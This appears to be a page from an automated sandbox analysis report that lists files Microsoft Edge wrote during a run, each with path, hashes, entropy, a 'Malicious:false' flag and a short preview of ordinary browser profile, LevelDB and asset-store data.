                                                                                        Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13366271669386045","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13366271669386045","location":5,"ma

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\5ba0fb0d-f4fb-4469-b70f-4296a173350d.tmp

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):9496
                                                                                        Entropy (8bit):5.102198319093565
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:strkdZs6haFvrEmkO33a38WbV+FiADUrPVYJ:strSs6hCDX6PbGiPO
                                                                                        MD5:A0C2A6BB55818308AC0F5088517238CE
                                                                                        SHA1:6B1D0885663DB256E2C13F38CBF3AFADEC0F705A
                                                                                        SHA-256:0740A4D059B672C3F7314B96598E66030D66751AAB41663CEAD70C45261ABDAD
                                                                                        SHA-512:0BD215A11488F448A4248AA76FD07921F65FF55D8D5B5BE6290B266E80A9541629FE03F2D6A79F9EECE01149CFDA9F7A49C236A9DA818CFBE41B92732824415B
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13366271670076295","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"default_apps_install_state":3,"dips_timer_la

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\6f809c86-154a-48c4-8bbe-b8c9422eb44f.tmp

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):26889
                                                                                        Entropy (8bit):5.57582104514716
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:7rTzUvWc8W5wFBf4DK8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPns5nIOTCarwXsRTU:7HIvp8WaFBfeKu1jaqs5XufXt3
                                                                                        MD5:4A480782F8123ED09F813D2723DE02B2
                                                                                        SHA1:CE3F9FBEF420228C3881FCE532720388243CB484
                                                                                        SHA-256:65E9896FE2A9FC6686FDF4563097282A7F08C45B7E71D3057B105283F9DC142F
                                                                                        SHA-512:25618E0D3F32462C89D719D8F67F912F34C9EC703C307B524D7F088E99D6845DD418EF672B713E593FAD86F5AB0F7BFC807C3EFDB3F3FCEE0FCA43EF71309437
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13366271669386045","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13366271669386045","location":5,"ma

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\71757604-4531-4121-8f92-33491d9db080.tmp

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):10679
                                                                                        Entropy (8bit):5.205262587520201
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:stFkdZs6haFvrENbdxPko33a38WbV+FMBQAJ3rPVYJ:stFSs6hCDEhT6PbGqQ43O
                                                                                        MD5:544548424538058B8AD2D06C97DD6C6D
                                                                                        SHA1:E0F26FA6A1FA68C447AA5DF37A72281B8E3C0480
                                                                                        SHA-256:F06101309FD89A450B3BF19701913875E75DEEB0AC1C8AC78ABDFC348CD60C46
                                                                                        SHA-512:90A85AEFDCC2D40603A999A1E6CBF78611D4919EC48D57404428544B8A96A1F6FAA61AF1068A0414229E27741EC52E1F19C6FA2310A057696EBC87B64926B011
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13366271670076295","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"li

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000001.dbtmp

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):16
                                                                                        Entropy (8bit):3.2743974703476995
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                        MD5:46295CAC801E5D4857D09837238A6394
                                                                                        SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                        SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                        SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:MANIFEST-000001.

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\CURRENT (copy)

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):16
                                                                                        Entropy (8bit):3.2743974703476995
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                        MD5:46295CAC801E5D4857D09837238A6394
                                                                                        SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                        SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                        SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:MANIFEST-000001.

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\MANIFEST-000001

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:OpenPGP Secret Key
                                                                                        Category:dropped
                                                                                        Size (bytes):41
                                                                                        Entropy (8bit):4.704993772857998
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                        MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                        SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                        SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                        SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:.|.."....leveldb.BytewiseComparator......

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:data
                                                                                        Category:modified
                                                                                        Size (bytes):481366
                                                                                        Entropy (8bit):5.396178535621642
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:IbS15tRdAYDI1JcYxI57aDZ7aJOGiMleOebNG/dFd2X13WA:IbcXAYDI1JcY+5WZ0OG1yJG/dKWA
                                                                                        MD5:DCFDD8C41DFB3F5655DD24364F433768
                                                                                        SHA1:D46DCA24D0712A1C99388A79E384C2997B3A8734
                                                                                        SHA-256:24F50420D82618465D3824E94181D9941090585203FF599946728949D9132EEC
                                                                                        SHA-512:593DFAE27A19DD2FECF5E3A6A48DD30789A0F0B87645352E1F0BD2FFBD71F6F00E81837D249F784FDC27F7047316EE899F10A0EE55D7C68E4B64A8BFD023BA5A
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:...m.................DB_VERSION.1.f.+.................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340960289901340.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):337
                                                                                        Entropy (8bit):5.128164918479957
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:BMk3Y+q2PN723oH+Tcwt9Eh1tIFUt84Mk3PZmw+4Mk3j3VkwON723oH+Tcwt9Ehx:pY+vVaYeb9Eh16FUt8CP/+CzV5OaYebY
                                                                                        MD5:E9B3C8486CA430EEFADBA41693048214
                                                                                        SHA1:1256B37DB9E638BD22558B435A526564BFA98E42
                                                                                        SHA-256:08D46160E3BF5E7909438C444E0E2AA99E7F028A7BF07DAF43D73117E974AD55
                                                                                        SHA-512:8E2570D32880AF5C358E8F10E85B68981F039E170A3F9C77C9AB87CA41C7D9F2712DC7808FE0904B6F30D18587891DC84C6216C629706A3962FD4217028D3AB4
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:2024/07/24-01:17:36.033 bbc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/07/24-01:17:36.034 bbc Recovering log #3.2024/07/24-01:17:36.045 bbc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old (copy)

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):337
                                                                                        Entropy (8bit):5.128164918479957
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:BMk3Y+q2PN723oH+Tcwt9Eh1tIFUt84Mk3PZmw+4Mk3j3VkwON723oH+Tcwt9Ehx:pY+vVaYeb9Eh16FUt8CP/+CzV5OaYebY
                                                                                        MD5:E9B3C8486CA430EEFADBA41693048214
                                                                                        SHA1:1256B37DB9E638BD22558B435A526564BFA98E42
                                                                                        SHA-256:08D46160E3BF5E7909438C444E0E2AA99E7F028A7BF07DAF43D73117E974AD55
                                                                                        SHA-512:8E2570D32880AF5C358E8F10E85B68981F039E170A3F9C77C9AB87CA41C7D9F2712DC7808FE0904B6F30D18587891DC84C6216C629706A3962FD4217028D3AB4
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:2024/07/24-01:17:36.033 bbc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/07/24-01:17:36.034 bbc Recovering log #3.2024/07/24-01:17:36.045 bbc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\000003.log

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):854771
                                                                                        Entropy (8bit):6.008324455548098
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:WIOvbPRBOiBhVcCWwyMYEkSm4+4b2mNacjYNbgyfvvSl6wjJbYY1viinpI0TSIBv:4vbP3SCrPqL4+s9B68ygJbrliinS0Uc
                                                                                        MD5:C1B6C9ECF67AAAB84CE2EAEF7755E568
                                                                                        SHA1:55C86AB553538F8956C891448F877E9F18D6D4C7
                                                                                        SHA-256:9E4387C2A4DF91193C5255CCC9B6FED0010CCE8D357405553E1BF9B3DF07D8E1
                                                                                        SHA-512:22FC03285A93AFA4AC8156EB228881DCBA28C8E726DA8B9B3AD482195AB8C759BB9502AFB822CE68D74BF00BC45611AFCB691532CCCBFE14BAFEC7CD01189A64
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:...m.................DB_VERSION.1%....................BLOOM_FILTER:..4{"numberOfHashFunctions":8,"shiftBase":8,"bloomFilterArraySize":5076937,"primeBases":[5381,5381,5381,5381],"supportedDomains":"+KpueC5asSXIZIPsxSM9oFrABA/sA5KbsHPEq4nft1eA5ilFB+17e2gzgxovpEvAPALRN/jt/Y8spI/RZIdtTmidRNEhCQpmwO9NKo0MMTUhpzZgQcU86foznOlNC4bK0F19/9fkQhNuns8LcYnS/W5NjVIYCGCuJfbQSkA+1l12wLIUVfYASb2eZaPHOiDANQ6zm+CRI4ePwz1NMi427bWiaTrSRlPkYh2+NuQUa2N45yQJJGBRIp8fuFERV/QQCewaIWnSqoWoROqdNKQiAc3xpiUV0DF2+NIbqyAMYt+ujA8syrUGevm+z7Gfz/3znbPwx6Q41tFTioXDLImDgA1Y9SsaGKAeuMEUtITXvyZRhDGnW+EgvYhCx+20/rirco2IG0ZohiqRuYtef/59/PHnl0sDNEN6zBtjaghg8u3/1lPYrvk5IvKUaAmATuJbFn/YAaLJVfi8mmoqSCKbDYk4rdmiWpWooxhY8XnxvDPL1hOu5N/YzFnNgx8tB6djJTvG+LlgXArW0NmNQxsqoyMADg6XgQFQNKB3Te1UCA88atTuDESweQ9IbhcpIJLESFTqPQESx5uIQAyOiTXIt+qBZV7ewBhCUoyUoMvIgUfMOqxWDZUCmBLc7ChlvSN0IR2jjDYXEC5a17OrbW+B7/CX3a8+ZsRo3+7M15gXmaR47gSwbKemOReLcOQWMiYUNNb3DOEdIGHkUbT024QDQYUAF/bem+Tzc/Y2/7t0fwXSwAyjnPU/73Hw39TcqowqT5A+XEhBStZQpJxJFe1yw5pyMmhGUMkCRIx

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\000005.ldb

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):854697
                                                                                        Entropy (8bit):6.00717335411728
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:GIOkb2RoOiihVcMWqyMaEkSC4o4b2mNlcUANbR3WvlSlXwjuMYYrviinwI0ySIBh:okb2VSMjPA14os9yx93+uMrTiin10ej
                                                                                        MD5:59EFE2E36D2988332DE46F4FA8542056
                                                                                        SHA1:D241FBCF89E62DAEE25CC9BBCEA8E7EA78E2F6EA
                                                                                        SHA-256:3F1F5EF12F703488B6B6AAB19FCE0E681602A93E20445A8F4FF8832B55440AD4
                                                                                        SHA-512:36FBD95D5AC8F36C76BCE42A4878D96A750365995928E6CCB19F21D44724943C8797FDFBB51D46629F15F2DAD6C8D27CEB6EF06B861A54FD91CE80F319EFEFCC
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:....4BLOOM_FILTER:........{"numberOfHashFunctions":8,"shiftBase":8,"bloomFilterArraySize":5076937,"primeBases":[5381,5381,5381,5381],"supportedDomains":"+KpueC5asSXIZIPsxSM9oFrABA/sA5KbsHPEq4nft1eA5ilFB+17e2gzgxovpEvAPALRN/jt/Y8spI/RZIdtTmidRNEhCQpmwO9NKo0MMTUhpzZgQcU86foznOlNC4bK0F19/9fkQhNuns8LcYnS/W5NjVIYCGCuJfbQSkA+1l12wLIUVfYASb2eZaPHOiDANQ6zm+CRI4ePwz1NMi427bWiaTrSRlPkYh2+NuQUa2N45yQJJGBRIp8fuFERV/QQCewaIWnSqoWoROqdNKQiAc3xpiUV0DF2+NIbqyAMYt+ujA8syrUGevm+z7Gfz/3znbPwx6Q41tFTioXDLImDgA1Y9SsaGKAeuMEUtITXvyZRhDGnW+EgvYhCx+20/rirco2IG0ZohiqRuYtef/59/PHnl0sDNEN6zBtjaghg8u3/1lPYrvk5IvKUaAmATuJbFn/YAaLJVfi8mmoqSCKbDYk4rdmiWpWooxhY8XnxvDPL1hOu5N/YzFnNgx8tB6djJTvG+LlgXArW0NmNQxsqoyMADg6XgQFQNKB3Te1UCA88atTuDESweQ9IbhcpIJLESFTqPQESx5uIQAyOiTXIt+qBZV7ewBhCUoyUoMvIgUfMOqxWDZUCmBLc7ChlvSN0IR2jjDYXEC5a17OrbW+B7/CX3a8+ZsRo3+7M15gXmaR47gSwbKemOReLcOQWMiYUNNb3DOEdIGHkUbT024QDQYUAF/bem+Tzc/Y2/7t0fwXSwAyjnPU/73Hw39TcqowqT5A+XEhBStZQpJxJFe1yw5pyMmhGUMkCRIxaFKFQAtZZowCNfWGXsmhGLEE31ghnT7XyOMz+u3127tX

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000001.dbtmp

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):16
                                                                                        Entropy (8bit):3.2743974703476995
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                        MD5:46295CAC801E5D4857D09837238A6394
                                                                                        SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                        SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                        SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:MANIFEST-000001.

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):392512
                                                                                        Entropy (8bit):5.408405844722619
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:Zz/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPZ:ZkdMyq49tEndBuHltBfdK5WNbsVEziP2
                                                                                        MD5:667C455DBCB63E0F1986ABAC01A9FA2C
                                                                                        SHA1:72A8092291C9902C2E36D667F1C9B0BD97F494B2
                                                                                        SHA-256:89B527F7EC1046A5BC4FA8F0D2EB5BE4B6710F62847FB85310808A1B950766E6
                                                                                        SHA-512:F320EEB3DB294B18E188E470DDB1B55716EE189C118BF7215442F1B17A0A12F3D0E27661D6E99D0AE720F75E28BE9AAE426A12BD184DEFA75C2A42B2F476C1A3
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:...m.................DB_VERSION.1..Y.q...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13366271682428955..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.75/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":75},"hash":"EwG2gkfquexLj6u3yjHyiL4YQwdU318k1Hub+1rSDMI=","size":391864}]Q"j%`~...............ASSET_VERSION:domains_config_gz.2.8.75..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\CURRENT (copy)

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):16
                                                                                        Entropy (8bit):3.2743974703476995
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                        MD5:46295CAC801E5D4857D09837238A6394
                                                                                        SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                        SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                        SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:MANIFEST-000001.

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):315
                                                                                        Entropy (8bit):5.104652545539255
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:BMksbs1N723oH+Tcwtk2WwnvB2KLlrMks4E9+q2PN723oH+Tcwtk2WwnvIFUv:aMaYebkxwnvFLs+vVaYebkxwnQFUv
                                                                                        MD5:9145FECED0587D288AC7F9E0D56242B4
                                                                                        SHA1:A5930EC2A851EB5FFA2713157C47729DC9037188
                                                                                        SHA-256:CDD90FE1B62E5B5601E1A0DB11BB59D4EA5D80AA7B7B14DC2230967FEDB6C6A3
                                                                                        SHA-512:8D748B368220315A91CDC02B28AFFCBE7FF3FC8CB00477F37578B851E9120D4BA5FE20128971EE17D30D6353D914D0F288404E5D53B269C2426DDE106A7A8015
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:2024/07/24-01:14:41.057 1ebc Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/07/24-01:14:41.229 1ebc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\MANIFEST-000001

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:OpenPGP Secret Key
                                                                                        Category:dropped
                                                                                        Size (bytes):41
                                                                                        Entropy (8bit):4.704993772857998
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                        MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                        SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                        SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                        SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:.|.."....leveldb.BytewiseComparator......

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\domains_config.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:modified
                                                                                        Size (bytes):374811
                                                                                        Entropy (8bit):5.396169874474049
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:dWLgimLVvUrsc6rRA81b/18jyJNjfvrfM6R+:cLBgAg1zfvG
                                                                                        MD5:42E2072A8123BC4C54E877BBCA6BD76D
                                                                                        SHA1:630A969438F7AD9EF1782C48B8E2163CC27BE85F
                                                                                        SHA-256:66AEF52DC36435D94C7B6BAA5A01FFDFE86C8A052B848D12E7300D6404F83481
                                                                                        SHA-512:FBD523C20B844DDB74EFFD7EF83698E5CC307DBD2D6C8FC33861E8C53F9156FA6F6663367F5F4454F487417258B33E0449AAB2679AC0421913CE96AE297128D7
                                                                                        Malicious:false
                                                                                        Reputation:unknown
